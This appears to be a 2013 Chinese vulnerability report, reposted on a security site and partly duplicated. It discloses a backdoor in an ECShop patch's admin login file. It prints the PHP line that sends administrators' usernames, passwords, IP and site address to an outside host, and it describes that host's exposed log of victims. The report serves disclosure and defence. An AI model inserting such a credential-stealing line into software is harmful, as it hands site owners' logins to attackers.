VULHUB ™

### 简要描述： 我们的网站ecshop有点二次开发，所以每次升级补丁都要对比下修改，结果这次对比发现了个大问题，官方的补丁文件内有段后门代码，目前来看应该是截订单的人留得，黑暗啊！ 反向分析了后门源码，找到了黑客的服务器，目测已经大量电商沦陷，我的妈呀！Ecshop你叫我们小站长肿么办！！ 求乌云救救我们！！ ### 详细说明： 补丁是 273utf8_patch006 ，包我幸运的保留下来了，提供给乌云管理放到网盘给厂商和安全研究人员分析。 ``` http://pan.baidu.com/share/link?shareid=3699376066&uk=456103769 ``` 问题出在 /admin/privilege.php 中（管理员身份验证文件），登录成功设置身份认证信息前，一个file_get_content函数，怪不得会绕过之前一些大牛们的分析。 ``` stat privilege.php 16777218 43425476 -rw-r--r-- 1 root root 0 25952 "Jun 4 19:16:09 2013" "May 6 14:18:36 2013" "Jun 4 18:59:14 2013" "May 6 14:18:36 2013" 4096 56 0 privilege.php @file_get_contents('http://bbs.olyouxi.com/api/manyou/ecshop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']); // 登录成功 set_admin_session($row['user_id'], $row['user_name'], $row['action_list'], $row['last_login']); ``` ### 漏洞证明：...

### 简要描述： 我们的网站ecshop有点二次开发，所以每次升级补丁都要对比下修改，结果这次对比发现了个大问题，官方的补丁文件内有段后门代码，目前来看应该是截订单的人留得，黑暗啊！ 反向分析了后门源码，找到了黑客的服务器，目测已经大量电商沦陷，我的妈呀！Ecshop你叫我们小站长肿么办！！ 求乌云救救我们！！ ### 详细说明： 补丁是 273utf8_patch006 ，包我幸运的保留下来了，提供给乌云管理放到网盘给厂商和安全研究人员分析。 ``` http://pan.baidu.com/share/link?shareid=3699376066&uk=456103769 ``` 问题出在 /admin/privilege.php 中（管理员身份验证文件），登录成功设置身份认证信息前，一个file_get_content函数，怪不得会绕过之前一些大牛们的分析。 ``` stat privilege.php 16777218 43425476 -rw-r--r-- 1 root root 0 25952 "Jun 4 19:16:09 2013" "May 6 14:18:36 2013" "Jun 4 18:59:14 2013" "May 6 14:18:36 2013" 4096 56 0 privilege.php @file_get_contents('http://bbs.olyouxi.com/api/manyou/ecshop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']); // 登录成功 set_admin_session($row['user_id'], $row['user_name'], $row['action_list'], $row['last_login']); ``` ### 漏洞证明： 这个代码将管理员用户名、密码、IP、时间和后台地址等信息通通的发到远程接口上，http://bbs.olyouxi.com/api/manyou/ecshop/w2.php 。 这个地址直接访问没什么，当我访问 ecshop 这个目录的时候发现居然可以目录遍历，还有一个 ok.php文件 ``` http://bbs.olyouxi.com/api/manyou/ecshop/ ``` [<img src="https://images.seebug.org/upload/201306/0419224572e01a9b7c42506a4af648d4a85ef9df.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/0419224572e01a9b7c42506a4af648d4a85ef9df.png) 在访问一下ok.php我震惊了！！ ``` http://bbs.olyouxi.com/api/manyou/ecshop/ok.php ``` [<img src="https://images.seebug.org/upload/201306/04192538c89e98bcec3ba35b5aad995803fcedff.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/04192538c89e98bcec3ba35b5aad995803fcedff.jpg) 就是这个后门所记录的那些数据，居然直接在这个文件里！受害人数扔在增长 [<img src="https://images.seebug.org/upload/201306/0419260353ebdb69feabcc0c03757fd6b489c171.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/0419260353ebdb69feabcc0c03757fd6b489c171.jpg)